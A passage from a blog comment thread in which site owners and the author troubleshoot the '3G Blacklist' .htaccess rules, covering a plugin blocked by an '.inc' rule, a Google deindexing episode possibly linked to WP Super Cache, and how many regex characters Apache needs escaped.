However, the Featurific plugin no longer does it’s thing http://featurific.com/ffw

Any idea what’s up?

Cheers,

Alex

And you have some lovely juicy stuff here!

[ Gravatar Icon ]

Jeff Starr#66

@Alex: Not sure, but I have downloaded a copy of the plugin and will investigate this weekend. Hopefully something will jump out at me. I will report back here early next week with my findings. Stay tuned..

[ Gravatar Icon ]

Tony#67

Hi Jeff, and all!

I had some troubles with Google after using the 3G Blacklist. I wasn’t sure it’s because of it, so I didn’t write here. But I guess it’s something worth investigating. Google deindexed my little blog, every single article about 2 months ago, and all I could find about it in Google Webmaster tools was that there was a 4xx (yes, just 4xx, nothing specific!) error when googlebot tried accessing the blog. I have another blog on the same server that wasn’t affected, and that blog didn’t have the 3G Blacklist in the .htaccess.

After deleting the 3G entries, googlebot accessed my site, and slowly started reindexing all of the articles.

I wasn’t archiving my monthly logs then (now I do), so I can’t know what really happened! But that unhelpful “4xx error” from Google really drove me crazy!!!

Jeff, please let me know if there’s any way I can find out anything about this problem. For the 4G Blacklist’s sake! I’ll setup a new blog and use the 3G on it if needed.

[ Gravatar Icon ]

Alex#68

Thanks for looking into this Jeff, and for the quick response.

I look forward to hearing your thoughts.

While you are on - do you think munging the name section of the comments code will kill off spam bots?

<input type="text" name="email" id="email" value="" size="22" tabindex="2" />
Mail (will not be published)

And yes, I am not the worlds greatest coder!

Cheers and thanks,

Alex

[ Gravatar Icon ]

Jeff Starr#69

@Tony: Yikes, I haven’t heard of anything like that happening before. Could you share a few of the URLs that were dropped from Google because of the 4xx error? This would enable me to look for a pattern or other reason why this may have happened. There are many things that can cause generic 4xx errors, but if the Blacklist was blocking access to all of your posts, then it may certainly be the culprit (but I hope not). Drop some of those URLs and let’s have a look.

@Alex: Interesting idea, but probably not effective, especially against spambots that bypass the form altogether and just hit the comments.php (or whatever) directly.

[ Gravatar Icon ]

Tony#70

Jeff, that was in December, and all of the articles disappeared then, but are back in Google’s index now. I didn’t want to say anything because I wasn’t sure, and nobody here had any problems. I should have emailed you I guess. Here are a couple of links:

http://www.bikeshake.com/pv-glider-mini-glider-balance-bike-review/
http://www.bikeshake.com/giro-hex-mountain-bike-helmet-review/

Maybe some plugin interfered, or maybe wasn’t compatible with the 3G. FYI, I used Super Cache then, which is temporarily deactivated now.

I hope you find the culprit. I really am waiting for the 4G Blacklist, and really want to taste it! :-)

Thanks in advance!

[ Gravatar Icon ]

Jeff Starr#71

@Tony: Ah, Super Cache. That would explain it. Check this out:

http://blog.nerdstargamer.com/2008/05/30/perishable-press-3g-blacklist-and-wp-super-cache/

And, even better than Alissa’s fix is the fact the Super Cache plugin is reported to have fixed their HTAccess code.

[ Gravatar Icon ]

Tony#72

Jeff,

The thing is, I had read all of the comments here, and Alissa’s post, before I pasted the 3G in my htaccess. And I also commented here a few months back about Super Cache not conflicting. Apparently only googlebot had problems accessing my site. Who knows, maybe it was drunk for a few days then? :-D

[ Gravatar Icon ]

Jeff Starr#73

@Tony: Not sure then. The issue you describe is unique — this is the first I am hearing of anything like this in nearly a year since the 3G Blacklist was released. Looking at the general format of your URLs, there doesn’t seem to be anything that inadvertently would be blocked. But even so, the possibility does exist that the list was somehow involved, perhaps by conflicting with another process or script used by the site or server. Definitely strange though, whatever happened.

[ Gravatar Icon ]

Jeff Starr#74

@Alex: Hey I checked out that plugin and it looks like there is a file that is being blocked by the 3G Blacklist, namely htmlparser.inc. This should be resolved easily by commenting out the following line:

RedirectMatch 403 \.inc

That should do the trick. Let me know how it goes!

[ Gravatar Icon ]

jidanni#75

Surely not every backslash here and in building-the-3g-blacklist-part-1 etc. are needed.

I sense you have gone hog wild on the backslashes, for fear of the unknown.

[ Gravatar Icon ]

Jeff Starr#76

I’m going to have to call your bluff on this one, jidanni — exactly which characters do not need to be escaped with a backslash?

[ Gravatar Icon ]

jidanni#77

I spent ten whole minutes in emacs,
(rgrep “backslash” “*” “/usr/share/doc/apache2-doc/manual/en/”)
(rgrep “escape” “*” “/usr/share/doc/apache2-doc/manual/en/”)
(w3m-goto-url “http://www.google.com/search?q=apache+backslash+escape” nil nil)
but couldn’t dig up the exact list. So… \y\o\u \w\i\n\\.

[ Gravatar Icon ]

Jeff Starr#78

Nor could I, thus the reason for the overly cautious application of escape characters. “Better safe than sorry” is sound advice, especially when dealing with anything involving HTAccess. Nice try though. ;)

[ Gravatar Icon ]

jidanni#79

OK, added Bug 46782 - list of what characters need to be escaped is hard to find
https://issues.apache.org/bugzilla/show_bug.cgi?id=46782

[ Gravatar Icon ]

Jeff Starr#80

Nice. Keep me posted — would be great to clean things up a bit..

[ Gravatar Icon ]

jidanni#81

Well, as you can see on the bug, they chucked it in the garbage.

[ Gravatar Icon ]

Jeff Starr#82

Yes, but I did notice their advice to escape regular expressions as such, which has been my modus operandi when dealing with HTAccess. At least they didn’t keep you waiting for a week before responding.

[ Gravatar Icon ]

jidanni#83

OK, we find
Apache uses Perl Compatible Regular Expressions provided by the PCRE library.
which
$ man perlre
perlre - Perl regular expressions
should tell the deal.

Trackbacks / Pingbacks
  1. Perishable 3G Blacklist « Secure WordPress
  2. How to Protect wp-config.php | Wordpress Security
Share your thoughts..

Read Comment Policy

Comment Rules: No spam. No profanity. Use your real name. You may use simple HTML tags for style. Wrap all code in <code> tags. Learn more.



Attention: Do NOT follow this link!